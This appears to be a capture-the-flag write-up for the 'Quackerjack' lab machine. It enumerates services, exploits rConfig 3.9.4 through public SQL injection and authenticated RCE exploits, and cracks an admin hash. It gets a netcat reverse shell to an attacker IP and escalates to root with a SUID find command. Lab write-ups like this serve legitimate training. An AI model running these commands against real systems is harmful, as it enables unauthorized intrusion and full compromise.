# Quackerjack

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-01cb4fe694c91019ffdb853743e8339974d59a35%2Fimage.png?alt=media)

## Nmap

```
sudo nmap 192.168.150.57 -sS -p- -sV 

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.2
22/tcp   open  ssh         OpenSSH 7.4 (protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
111/tcp  open  rpcbind     2-4 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
3306/tcp open  mysql       MariaDB (unauthorized)
8081/tcp open  ssl/http    Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
Service Info: Host: QUACKERJACK; OS: Unix
```

## FTP

I performed a quick check for anonymous login on FTP and was returned a logon error.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-61d88e58a481f020b4884e765e519891e81a4c15%2Fimage.png?alt=media)

## SMB

As we have no luck with FTP I then run `enum4linux` against the target to look for users, groups and to perform RID cycling.

```
enum4linux -U -G -r 192.168.189.98
```

Unfortunately `enum4linux` did not return any relevant users information. I also checked null authentication against the target.

```
smbmap -u '' -p '' -R -H 192.168.150.57
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-925ae99260d361505b73b287f298cae850fef121%2Fimage.png?alt=media)

## HTTP

As we have HTTP running on port 80 and 8081 we can run `gobuster` against these ports.

```
gobuster dir -u http://192.168.150.57 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s 200 -x txt,zip,php
gobuster dir -u https://192.168.150.57:8081 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s 200 -x txt,zip,php -k
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-629acc3448be3f072227c9cc141cc7727ce67328%2Fimage.png?alt=media)

The default page for 80 brings us to a CentOS Apache test page.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-f9a9a08bdb6b3def350d17899e8129e2ac8c3920%2Fimage.png?alt=media)

On port 8081 we come to a login page for rConfig. As we can see from the landing page rConfig is running on version 3.9.4.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-bdd37dbc2821607d7f8c9a17fbc10b5442421899%2Fimage.png?alt=media)

## Exploitation

A Google search reveals a multitude of exploits for this for varying versions. I went thought a fair few some of which I could not get to work which are specific to 3.9.4. Eventually I come across a SQL injection exploit.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c7ca60833124581fc3004c1695c6f07ece14638b%2Fimage.png?alt=media)

{% embed url="<https://www.exploit-db.com/exploits/48208>" %}

Run the exploit with the following syntax.

```
python3 exploit.py https://192.168.150.57:8081
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-b2ed38b8464d32271c1907625bcc2460ff78cac2%2Fimage.png?alt=media)

We manage to extract a hash. I identified this as a MD5 hash and was not able to crack with `John` using the rockyou.txt. I ended putting the hash into online databases to find a match.

{% embed url="<https://www.md5online.org/md5-decrypt.html>" %}

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-0322d5fb71e08b70931f3cca8554e327aca07790%2Fimage.png?alt=media)

We now have the following credentials for rConfig.

```
admin:abgrtyu
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-be19f3eef46c4301caf80d47ba09b0228503bbd0%2Fimage.png?alt=media)

## Exploitation (Authenticated)

Now that we are authenticated we can search for authenticated exploits. I soon come across an authenticated remote code execution exploit for 3.9.3. Whilst not intended for the version we have 3.9.4 we can try it anyway.

{% embed url="<https://www.exploit-db.com/exploits/47982>" %}

Looking at the exploit code looks like we supply the arguments below and in return the payload will attempt a bash reverse shell back to us.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5c3c508b0374ca875f4682cf2744e3df9aa542d0%2Fimage.png?alt=media)

First set up a `netcat` listener on our attacking machine. I am going to use port 80 this is a common port for outbound traffic.

```
sudo nc -lvp 80
```

Then execute the exploit with the following syntax:

```
python3 ./exploit.py https://<Target-IP>:8081 admin abgrtyu <Attacking-IP> 80
```

Once we have run the exploit we should get a shell back on our listener.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d16c551bb13b57ad931e6b154a2a3a89753e88af%2Fimage.png?alt=media)

We confirm we are the apache user.

## Privilege Escalation

In the home directory we have the user 'rConfig'. I grabbed the local.txt flag and then started a `Python SimpleHTTPServer` on my attacking machine. I then uploaded `linpeas.sh` to aid with privilege escalation.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4ac34e4bb513496340da9784061087db7cb206ae%2Fimage.png?alt=media)

After running `linpeas` and going through the results we actually have various potential exploits. I will be focusing on the SUID being set on the find binary.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-dfa8072bc5d95035f127c14deffb9181ac49deed%2Fimage.png?alt=media)

We can check on [GTFObins](https://gtfobins.github.io/gtfobins/find/) for how we cab use the binary for privilege escalation.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-b03f2bc97f0e8cdf8e5b63282b346ea245e7355d%2Fimage.png?alt=media)

Lets use the syntax above and call the binary and see if we can escape the restricted shell as root.

```
/usr/bin/find . -exec /bin/sh -p \; -quit
```

Once we escape we should have a root shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-2a89dd51d653d8c1f445ea3a0870b34cc32b6244%2Fimage.png?alt=media)